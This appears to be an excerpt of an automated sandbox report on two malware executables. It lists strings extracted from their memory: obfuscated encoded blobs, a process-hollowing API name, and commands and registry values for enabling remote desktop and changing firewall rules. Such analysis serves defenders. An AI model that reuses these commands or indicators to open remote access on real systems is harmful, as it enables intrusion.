VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: XO4ioEY3nq.exe, 00000000.00000002.2080306878.00000000000C1000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: XO4ioEY3nq.exe, 00000000.00000002.2080306878.00000000000C1000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: XO4ioEY3nq.exe, 00000000.00000003.2079187094.000000000729A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: XO4ioEY3nq.exe, 00000000.00000003.2079187094.000000000729A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000000.2079602445.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000000.2079602445.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000001.00000002.4538515136.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000001.00000002.4538515136.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000000.2096114895.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000000.2096114895.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000002.00000002.2098637123.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000002.2098637123.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr 